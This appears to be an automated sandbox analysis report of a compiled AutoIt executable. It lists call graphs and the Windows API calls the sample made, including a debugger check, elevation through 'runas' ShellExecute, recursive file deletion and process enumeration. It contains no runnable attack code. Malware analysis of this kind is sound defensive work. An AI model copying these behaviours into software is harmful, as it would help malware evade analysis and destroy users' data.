a12f92 10 API calls 104705->104755 104712 a13797 104706->104712 104713 a137bc SetTimer RegisterWindowMessageW 104706->104713 104707->104730 104709 a13743 104708->104709 104710 a53e61 104708->104710 104714 a1374d 104709->104714 104715 a1380e 104709->104715 104758 a7c8f7 65 API calls ___scrt_fastfail 104710->104758 104719 a53d95 104712->104719 104720 a137a0 KillTimer 104712->104720 104716 a137e5 CreatePopupMenu 104713->104716 104713->104730 104721 a13758 104714->104721 104734 a53e46 104714->104734 104745 a2fcad 104715->104745 104716->104730 104718 a53e15 104756 a2f23c 40 API calls 104718->104756 104724 a53dd0 MoveWindow 104719->104724 104725 a53d9a 104719->104725 104726 a13907 Shell_NotifyIconW 104720->104726 104727 a137f2 104721->104727 104729 a13763 104721->104729 104724->104730 104731 a53da0 104725->104731 104732 a53dbf SetFocus 104725->104732 104733 a137b3 104726->104733 104753 a1381f 75 API calls ___scrt_fastfail 104727->104753 104728 a53e73 104728->104704 104728->104730 104729->104704 104742 a13907 Shell_NotifyIconW 104729->104742 104731->104729 104736 a53da9 104731->104736 104732->104730 104752 a159ff DeleteObject DestroyWindow 104733->104752 104734->104704 104757 a71423 8 API calls 104734->104757 104754 a12f92 10 API calls 104736->104754 104739->104704 104740 a13802 104740->104730 104743 a53e3a 104742->104743 104744 a1396b 60 API calls 104743->104744 104744->104739 104746 a2fcc5 ___scrt_fastfail 104745->104746 104747 a2fd4b 104745->104747 104748 a161a9 55 API calls 104746->104748 104747->104730 104750 a2fcec 104748->104750 104749 a2fd34 KillTimer SetTimer 104749->104747 104750->104749 104751 a6fe2b Shell_NotifyIconW 104750->104751 104751->104749 104752->104730 104753->104740 104754->104730 104755->104718 104756->104729 104757->104739 104758->104728 105412 a65050 105416 a81a7f 105412->105416 105414 a6505b 105415 a81a7f 52 API calls 105414->105415 105415->105414 105417 a81ab9 105416->105417 105422 a81a8c 105416->105422 105417->105414 105418 a81abb 105428 a2fd71 52 API calls 105418->105428 105419 a81ac0 105421 a18ec0 52 API calls 105419->105421 105423 a81ac7 105421->105423 105422->105417 105422->105418 105422->105419 105425 a81ab3 105422->105425 105424 a17bb5 8 API calls 105423->105424 105424->105417 105427 a1c520 39 API calls 105425->105427 105427->105417 105428->105419 105429 a65650 105438 a2e3d5 105429->105438 105431 a65666 105437 a656e1 105431->105437 105447 a2aa65 9 API calls 105431->105447 105434 a661d7 105435 a656c1 105435->105437 105448 a8247e 8 API calls 105435->105448 105437->105434 105449 a83fe1 81 API calls __wsopen_s 105437->105449 105439 a2e3e3 105438->105439 105440 a2e3f6 105438->105440 105441 a1b4c8 8 API calls 105439->105441 105442 a2e3fb 105440->105442 105443 a2e429 105440->105443 105444 a2e3ed 105441->105444 105445 a3014b 8 API calls 105442->105445 105446 a1b4c8 8 API calls 105443->105446 105444->105431 105445->105444 105446->105444 105447->105435 105448->105437 105449->105434 105450 a11098 105455 a15fc8 105450->105455 105454 a110a7 105456 a1bf73 8 API calls 105455->105456 105457 a15fdf GetVersionExW 105456->105457 105458 a18577 8 API calls 105457->105458 105459 a1602c 105458->105459 105460 a1adf4 8 API calls 105459->105460 105474 a16062 105459->105474 105461 a16056 105460->105461 105463 a155dc 8 API calls 105461->105463 105462 a1611c GetCurrentProcess IsWow64Process 105464 a16138 105462->105464 105463->105474 105465 a16150 LoadLibraryA 105464->105465 105466 a55269 GetSystemInfo 105464->105466 105467 a16161 GetProcAddress 105465->105467 105468 a1619d GetSystemInfo 105465->105468 105467->105468 105471 a16171 GetNativeSystemInfo 105467->105471 105469 a16177 105468->105469 105472 a1109d 105469->105472 105473 a1617b FreeLibrary 105469->105473 105470 a55224 105471->105469 105475 a30413 29 API calls __onexit 105472->105475 105473->105472 105474->105462 105474->105470 105475->105454 105476 a1105b 105481 a152a7 105476->105481 105478 a1106a 105512 a30413 29 API calls __onexit 105478->105512 105480 a11074 105482 a152b7 __wsopen_s 105481->105482 105483 a1bf73 8 API calls 105482->105483 105484 a1536d 105483->105484 105485 a15594 10 API calls 105484->105485 105486 a15376 105485->105486 105513 a15238 105486->105513 105489 a16b7c 8 API calls 105490 a1538f 105489->105490 105491 a16a7c 8 API calls 105490->105491 105492 a1539e 105491->105492 105493 a1bf73 8 API calls 105492->105493 105494 a153a7 105493->105494 105495 a1bd57 8 API calls 105494->105495 105496 a153b0 RegOpenKeyExW 105495->105496 105497 a54be6 RegQueryValueExW 105496->105497 105501 a153d2 105496->105501 105498 a54c03 105497->105498 105499 a54c7c RegCloseKey 105497->105499 105500 a3017b 8 API calls 105498->105500 105499->105501 105510 a54c8e _wcslen 105499->105510 105502 a54c1c 105500->105502 105501->105478 105503 a1423c 8 API calls 105502->105503 105504 a54c27 RegQueryValueExW 105503->105504 105506 a54c44 105504->105506 105508 a54c5e messages 105504->105508 105505 a1655e 8 API calls 105505->105510 105507 a18577 8 API calls 105506->105507 105507->105508 105508->105499 105509 a1b329 8 API calls 105509->105510 105510->105501 105510->105505 105510->105509 105511 a16a7c 8 API calls 105510->105511 105511->105510 105512->105480 105514 a522d0 __wsopen_s 105513->105514 105515 a15245 GetFullPathNameW 105514->105515 105516 a15267 105515->105516 105517 a18577 8 API calls 105516->105517 105518 a15285 105517->105518 105518->105489 104759 a1dd3d 104760 a1dd63 104759->104760 104761 a619c2 104759->104761 104762 a1dead 104760->104762 104765 a3014b 8 API calls 104760->104765 104764 a61a82 104761->104764 104769 a61a26 104761->104769 104772 a61a46 104761->104772 104766 a3017b 8 API calls 104762->104766 104819 a83fe1 81 API calls __wsopen_s 104764->104819 104771 a1dd8d 104765->104771 104778 a1dee4 __fread_nolock 104766->104778 104767 a61a7d 104817 a2e6e8 206 API calls 104769->104817 104773 a3014b 8 API calls 104771->104773 104771->104778 104772->104767 104818 a83fe1 81 API calls __wsopen_s 104772->104818 104775 a1dddb 104773->104775 104774 a3017b 8 API calls 104774->104778 104775->104769 104776 a1de16 104775->104776 104777 a20340 206 API calls 104776->104777 104779 a1de29 104777->104779 104778->104772 104778->104774 104779->104767 104779->104778 104780 a61aa5 104779->104780 104781 a1de77 104779->104781 104783 a1d526 104779->104783 104820 a83fe1 81 API calls __wsopen_s 104780->104820 104781->104762 104781->104783 104784 a3014b 8 API calls 104783->104784 104785 a1d589 104784->104785 104801 a1c32d 104785->104801 104788 a3014b 8 API calls 104793 a1d66e messages 104788->104793 104790 a1b4c8 8 API calls 104790->104793 104792 a61f79 104821 a756ae 8 API calls messages 104792->104821 104793->104790 104793->104792 104795 a61f94 104793->104795 104796 a1bed9 8 API calls 104793->104796 104797 a1c3ab 8 API calls 104793->104797 104798 a1d911 messages 104793->104798 104796->104793 104797->104793 104799 a1d9ac messages 104798->104799 104808 a1c3ab 104798->104808 104800 a1d9c3 104799->104800 104816 a2e30a 8 API calls messages 104799->104816 104804 a1c33d 104801->104804 104802 a1c345 104802->104788 104803 a3014b 8 API calls 104803->104804 104804->104802 104804->104803 104805 a1bf73 8 API calls 104804->104805 104806 a1bed9 8 API calls 104804->104806 104807 a1c32d 8 API calls 104804->104807 104805->104804 104806->104804 104807->104804 104809 a1c3e1 messages 104808->104809 104811 a1c3b9 104808->104811 104809->104799 104810 a1c3c7 104813 a1c3cd 104810->104813 104814 a1c3ab 8 API calls 104810->104814 104811->104810 104812 a1c3ab 8 API calls 104811->104812 104812->104810 104813->104809 104822 a1c7e0 8 API calls messages 104813->104822 104814->104813 104816->104799 104817->104772 104818->104767 104819->104767 104820->104767 104821->104795 104822->104809 104823 a20ebf 104824 a20ed3 104823->104824 104830 a21425 104823->104830 104825 a20ee5 104824->104825 104826 a3014b 8 API calls 104824->104826 104827 a6562c 104825->104827 104828 a1b4c8 8 API calls 104825->104828 104829 a20f3e 104825->104829 104826->104825 104856 a81b14 8 API calls 104827->104856 104828->104825 104832 a22b20 206 API calls 104829->104832 104847 a2049d messages 104829->104847 104830->104825 104833 a1bed9 8 API calls 104830->104833 104855 a20376 messages 104832->104855 104833->104825 104834 a6632b 104860 a83fe1 81 API calls __wsopen_s 104834->104860 104835 a21e50 40 API calls 104835->104855 104836 a3014b 8 API calls 104836->104855 104837 a21695 104842 a1bed9 8 API calls 104837->104842 104837->104847 104839 a65cdb 104846 a1bed9 8 API calls 104839->104846 104839->104847 104840 a6625a 104859 a83fe1 81 API calls __wsopen_s 104840->104859 104841 a1bed9 8 API calls 104841->104855 104842->104847 104845 a21990 206 API calls 104845->104855 104846->104847 104848 a1bf73 8 API calls 104848->104855 104849 a30413 29 API calls pre_c_initialization 104849->104855 104850 a305b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 104850->104855 104851 a66115 104857 a83fe1 81 API calls __wsopen_s 104851->104857 104852 a20aae messages 104858 a83fe1 81 API calls __wsopen_s 104852->104858 104853 a30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 104853->104855 104855->104834 104855->104835 104855->104836 104855->104837 104855->104839 104855->104840 104855->104841 104855->104845 104855->104847 104855->104848 104855->104849 104855->104850 104855->104851 104855->104852 104855->104853 104856->104847 104857->104852 104858->104847 104859->104847 104860->104847 105519 a1f4dc 105520 a1cab0 206 API calls 105519->105520 105521 a1f4ea 105520->105521 104861 a4947a 104862 a49487 104861->104862 104865 a4949f 104861->104865 104911 a3f649 20 API calls __dosmaperr 104862->104911 104864 a4948c 104912 a42b5c 26 API calls pre_c_initialization 104864->104912 104867 a494fa 104865->104867 104875 a49497 104865->104875 104913 a50144 21 API calls 2 library calls 104865->104913 104869 a3dcc5 __fread_nolock 26 API calls 104867->104869 104870 a49512 104869->104870 104881 a48fb2 104870->104881 104872 a49519 104873 a3dcc5 __fread_nolock 26 API calls 104872->104873 104872->104875 104874 a49545 104873->104874 104874->104875 104876 a3dcc5 __fread_nolock 26 API calls 104874->104876 104877 a49553 104876->104877 104877->104875 104878 a3dcc5 __fread_nolock 26 API calls 104877->104878 104879 a49563 104878->104879 104880 a3dcc5 __fread_nolock 26 API calls 104879->104880 104880->104875 104882 a48fbe ___BuildCatchObject 104881->104882 104883 a48fc6 104882->104883 104884 a48fde 104882->104884 104915 a3f636 20 API calls __dosmaperr 104883->104915 104886 a490a4 104884->104886 104891 a49017 104884->104891 104922 a3f636 20 API calls __dosmaperr 104886->104922 104888 a48fcb 104916 a3f649 20 API calls __dosmaperr 104888->104916 104889 a490a9 104923 a3f649 20 API calls __dosmaperr 104889->104923 104893 a49026 104891->104893 104894 a4903b 104891->104894 104917 a3f636 20 API calls __dosmaperr 104893->104917 104914 a454ba EnterCriticalSection 104894->104914 104896 a49033 104924 a42b5c 26 API calls pre_c_initialization 104896->104924 104898 a49041 104901 a49072 104898->104901 104902 a4905d 104898->104902 104899 a4902b 104918 a3f649 20 API calls __dosmaperr 104899->104918 104906 a490c5 __fread_nolock 38 API calls 104901->104906 104919 a3f649 20 API calls __dosmaperr 104902->104919 104905 a48fd3 __fread_nolock 104905->104872 104908 a4906d 104906->104908 104907 a49062 104920 a3f636 20 API calls __dosmaperr 104907->104920 104921 a4909c LeaveCriticalSection __wsopen_s 104908->104921 104911->104864 104912->104875 104913->104867 104914->104898 104915->104888 104916->104905 104917->104899 104918->104896 104919->104907 104920->104908 104921->104905 104922->104889 104923->104896 104924->104905 105522 a2235c 105531 a22365 __fread_nolock 105522->105531 105523 a18ec0 52 API calls 105523->105531 105524 a674e3 105534 a713c8 8 API calls __fread_nolock 105524->105534 105526 a674ef 105530 a1bed9 8 API calls 105526->105530 105532 a21ff7 __fread_nolock 105526->105532 105527 a223b6 105529 a17d74 8 API calls 105527->105529 105528 a3014b 8 API calls 105528->105531 105529->105532 105530->105532 105531->105523 105531->105524 105531->105527 105531->105528 105531->105532 105533 a3017b 8 API calls 105531->105533 105533->105531 105534->105526

                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                    Function 00A15FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 234 a15fc8-a16037 call a1bf73 GetVersionExW call a18577 239 a5507d-a55090 234->239 240 a1603d 234->240 241 a55091-a55095 239->241 242 a1603f-a16041 240->242 243 a55097 241->243 244 a55098-a550a4 241->244 245 a16047-a160a6 call a1adf4 call a155dc 242->245 246 a550bc 242->246 243->244 244->241 248 a550a6-a550a8 244->248 258 a55224-a5522b 245->258 259 a160ac-a160ae 245->259 251 a550c3-a550cf 246->251 248->242 250 a550ae-a550b5 248->250 250->239 254 a550b7 250->254 252 a1611c-a16136 GetCurrentProcess IsWow64Process 251->252 256 a16195-a1619b 252->256 257 a16138 252->257 254->246 260 a1613e-a1614a 256->260 257->260 263 a5522d 258->263 264 a5524b-a5524e 258->264 261 a55125-a55138 259->261 262 a160b4-a160b7 259->262 265 a16150-a1615f LoadLibraryA 260->265 266 a55269-a5526d GetSystemInfo 260->266 268 a55161-a55163 261->268 269 a5513a-a55143 261->269 262->252 270 a160b9-a160f5 262->270 267 a55233 263->267 271 a55250-a5525f 264->271 272 a55239-a55241 264->272 273 a16161-a1616f GetProcAddress 265->273 274 a1619d-a161a7 GetSystemInfo 265->274 267->272 279 a55165-a5517a 268->279 280 a55198-a5519b 268->280 276 a55145-a5514b 269->276 277 a55150-a5515c 269->277 270->252 278 a160f7-a160fa 270->278 271->267 281 a55261-a55267 271->281 272->264 273->274 282 a16171-a16175 GetNativeSystemInfo 273->282 275 a16177-a16179 274->275 283 a16182-a16194 275->283 284 a1617b-a1617c FreeLibrary 275->284 276->252 277->252 285 a550d4-a550e4 278->285 286 a16100-a1610a 278->286 287 a55187-a55193 279->287 288 a5517c-a55182 279->288 289 a551d6-a551d9 280->289 290 a5519d-a551b8 280->290 281->272 282->275 284->283 291 a550f7-a55101 285->291 292 a550e6-a550f2 285->292 286->251 294 a16110-a16116 286->294 287->252 288->252 289->252 293 a551df-a55206 289->293 295 a551c5-a551d1 290->295 296 a551ba-a551c0 290->296 297 a55114-a55120 291->297 298 a55103-a5510f 291->298 292->252 299 a55213-a5521f 293->299 300 a55208-a5520e 293->300 294->252 295->252 296->252 297->252 298->252 299->252 300->252
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00A15FF7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00AADC2C,00000000,?,?), ref: 00A16123
                                                                                                                                                                                                                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00A1612A
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00A16155
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A16167
                                                                                                                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00A16175
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00A1617C
                                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00A161A1
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                                    • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                                    • Opcode ID: bdb8414c1b83ebaae5f11631a294d8a731a61c376b43ce435f268e46bbc89b35
                                                                                                                                                                                                                                                                                                    • Instruction ID: d63274f5573e05dbd7d15a79203324b354fe88d3004ac55f108dab5ecf836786
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdb8414c1b83ebaae5f11631a294d8a731a61c376b43ce435f268e46bbc89b35
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9A18F3290A6C6DFC711CBF87CC23E97F697B66301B084999D4819F262C679498ADF31
                                                                                                                                                                                                                                                                                                    Function 00A1338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A13368,?), ref: 00A133BB
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A13368,?), ref: 00A133CE
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00AE2418,00AE2400,?,?,?,?,?,?,00A13368,?), ref: 00A1343A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A13462,00AE2418,?,?,?,?,?,?,?,00A13368,?), ref: 00A142A0
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,00AE2418,?,?,?,?,?,?,?,00A13368,?), ref: 00A134BB
                                                                                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00A53CB0
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00AE2418,?,?,?,?,?,?,?,00A13368,?), ref: 00A53CF1
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AD31F4,00AE2418,?,?,?,?,?,?,?,00A13368), ref: 00A53D7A
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00A53D81
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: GetSysColorBrush.USER32(0000000F), ref: 00A134DE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: LoadCursorW.USER32(00000000,00007F00), ref: 00A134ED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: LoadIconW.USER32(00000063), ref: 00A13503
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: LoadIconW.USER32(000000A4), ref: 00A13515
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: LoadIconW.USER32(000000A2), ref: 00A13527
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A1353F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A134D3: RegisterClassExW.USER32(?), ref: 00A13590
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A135B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A135E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A135B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13602
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A13368,?), ref: 00A13616
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A13368,?), ref: 00A1361F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A13A3C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • AutoIt, xrefs: 00A53CA5
                                                                                                                                                                                                                                                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00A53CAA
                                                                                                                                                                                                                                                                                                    • runas, xrefs: 00A53D75
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                                    • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                                    • Opcode ID: 97e07b15c177de315be5a56d14ad84d1f009da144e4baa7e3586d6602ca49eb4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 815ec86c5695ba701358a35f7127b7b6df450cdb659e933c8b0c33a605815b90
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97e07b15c177de315be5a56d14ad84d1f009da144e4baa7e3586d6602ca49eb4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C151FB32148385AACF01EFA09D55EEE7BBDAF95740F04042DF4C25A1E2DB74868ED762
                                                                                                                                                                                                                                                                                                    Function 00A7DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A155D1,?,?,00A54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A15871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7EAB0: GetFileAttributesW.KERNEL32(?,00A7D840), ref: 00A7EAB1
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00A7DCCB
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A7DD1B
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A7DD2C
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A7DD43
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A7DD4C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                                    • Opcode ID: 064cf51e5484d0c06efff4cb8980c67c848a12de36077c4f098d4bb68a0e6b76
                                                                                                                                                                                                                                                                                                    • Instruction ID: 77c7b85eae6bfd9afdb8eb66ab932794ffe395858de2f0af0612922c6da9e62a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 064cf51e5484d0c06efff4cb8980c67c848a12de36077c4f098d4bb68a0e6b76
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A315E31019345AFC315EB60DD819EFBBF8BE96304F408D5DF4D682191EB21DA4ACB62
                                                                                                                                                                                                                                                                                                    Function 00A7DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 1574 a7dd87-a7ddcf CreateToolhelp32Snapshot Process32FirstW call a7e80e 1577 a7de7d-a7de80 1574->1577 1578 a7de86-a7de95 CloseHandle 1577->1578 1579 a7ddd4-a7dde3 Process32NextW 1577->1579 1579->1578 1580 a7dde9-a7de58 call a1bf73 * 2 call a1b329 call a1568e call a1bd98 call a17bb5 call a2e36b 1579->1580 1595 a7de62-a7de69 1580->1595 1596 a7de5a-a7de5c 1580->1596 1598 a7de6b-a7de78 call a1bd98 * 2 1595->1598 1597 a7de5e-a7de60 1596->1597 1596->1598 1597->1595 1597->1598 1598->1577
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00A7DDAC
                                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00A7DDBA
                                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00A7DDDA
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A7DE87
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1a4580cfe267e50719e0432dae66c59c0506cf66ff43943c001698b79fd135ae
